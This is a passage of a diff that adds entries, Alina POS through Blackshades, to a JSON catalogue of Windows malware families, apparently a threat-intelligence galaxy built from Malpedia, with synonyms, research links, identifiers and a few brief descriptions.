"value": "Project Alice", + "description": "" + }, + { + "meta": { + "synonyms": [ + "alina_spark", + "katrina", + "alina_eagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", + "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", + "https://www.nuix.com/blog/alina-continues-spread-its-wings", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" + ] + }, + "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", + "value": "Alina POS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Starman" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", + "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", + "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" + ] + }, + "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", + "value": "Allaple", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + ] + }, + "uuid": "a0881a0c-e677-495b-b475-290af09bb716", + "value": "Alma Communicator", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" + ] + }, + "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", + "value": "AlmaLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", + "value": "ALPC Local PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", + "https://twitter.com/JaromirHorejsi/status/813714602466877440" + ] + }, + "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", + "value": "Alphabet Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", + "https://blog.cylance.com/an-introduction-to-alphalocker" + ] + }, + "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", + "value": "AlphaLocker", + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", + "value": "AlphaNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", + "value": "Alreay", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Olmarik", + "Pihar", + "TDSS", + "TDL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ] + }, + "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", + "value": "Alureon", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Adupihan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", + "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + ] + }, + "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", + "value": "AMTsol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gamarue", + "B106-Gamarue", + "B67-SS-Gamarue", + "b66" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", + "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" + ] + }, + "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", + "value": "Andromeda", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + ] + }, + "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", + "value": "Anel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Latinus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" + ] + }, + "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", + "value": "Antilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", + "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" + ] + }, + "uuid": "d3e16d46-e436-4757-b962-6fd393056415", + "value": "Apocalipto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", + "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" + ] + }, + "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", + "value": "Apocalypse", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + ] + }, + "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", + "value": "ArdaMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", + "value": "Arefty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aaron Keylogger" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", + "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", + "http://remote-keylogger.net/" + ] + }, + "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", + "value": "Arik Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://twitter.com/Racco42/status/1001374490339790849", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + ] + }, + "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", + "value": "ARS VBS Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" + ] + }, + "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", + "value": "AscentLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" + ] + }, + "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", + "value": "ASPC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aseljo", + "BadSrc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", + "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" + ] + }, + "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", + "value": "Asprox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", + "http://blog.talosintel.com/2017/02/athena-go.html" + ] + }, + "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", + "value": "AthenaGo RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", + "value": "ATI-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", + "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" + ] + }, + "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", + "value": "ATMii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + ] + }, + "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", + "value": "ATMitch", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", + "value": "Atmosphere", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + ] + }, + "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", + "value": "ATMSpitter", + "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", + "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", + "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" + ] + }, + "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", + "value": "August Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Riodrv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", + "value": "Auriga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + ] + }, + "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", + "value": "Aurora", + "description": "Ransomware" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", + "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" + ] + }, + "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", + "value": "AvastDisabler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + ] + }, + "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", + "value": "AVCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" + ] + }, + "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", + "value": "Aveo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", + "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" + ] + }, + "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", + "value": "Avzhan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" + ] + }, + "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", + "value": "Ayegent", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PuffStealer", + "Rultazo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", + "value": "Azorult", + "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." + }, + { + "meta": { + "synonyms": [ + "SNOWBALL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", + "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "http://www.spiegel.de/media/media-35683.pdf", + "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + ] + }, + "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", + "value": "Babar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", + "value": "BABYMETAL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", + "value": "backspace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", + "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", + "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", + "https://www.cert.pl/en/news/single/backswap-malware-analysis/" + ] + }, + "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", + "value": "BackSwap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", + "https://twitter.com/PhysicalDrive0/status/833067081981710336" + ] + }, + "uuid": "af1c99be-e55a-473e-abed-726191e1da05", + "value": "BadEncript", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", + "value": "badflick", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + ] + }, + "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", + "value": "BadNews", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" + ] + }, + "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", + "value": "Bagle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", + "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" + ] + }, + "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", + "value": "Banatrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", + "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" + ] + }, + "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", + "value": "bangat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MultiBanker 2", + "BankPatch", + "BackPatcher" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", + "http://blog.kleissner.org/?p=69", + "http://osint.bambenekconsulting.com/feeds/", + "http://blog.kleissner.org/?p=192", + "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" + ] + }, + "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", + "value": "Banjori", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + ] + }, + "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", + "value": "Bankshot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + ] + }, + "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", + "value": "Bart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", + "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" + ] + }, + "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", + "value": "BatchWiper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + ] + }, + "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", + "value": "Batel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" + ] + }, + "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", + "value": "BBSRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" + ] + }, + "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", + "value": "Bedep", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ] + }, + "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", + "value": "beendoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", + "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + ] + }, + "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", + "value": "BernhardPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Neurevt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", + "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", + "http://www.xylibox.com/2015/04/betabot-retrospective.html", + "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", + "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" + ] + }, + "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", + "value": "BetaBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" + ] + }, + "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", + "value": "BfBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", + "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", + "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", + "https://habrahabr.ru/post/213973/" + ] + }, + "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", + "value": "BillGates", + "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." + }, + { + "meta": { + "synonyms": [ + "zxdosml" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", + "value": "Biscuit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + ] + }, + "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", + "value": "Bitsran", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bwin3_bka" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", + "https://www.evild3ad.com/405/bka-trojaner-ransomware/" + ] + }, + "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", + "value": "BKA Trojaner", + "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" + ] + }, + "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", + "value": "BlackEnergy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "POSWDS", + "Reedum", + "Kaptoxa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + ] + }, + "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", + "value": "BlackPOS", + "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. " + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", + "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" + ] + }, + "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", + "value": "BlackRevolution", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", + "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", + 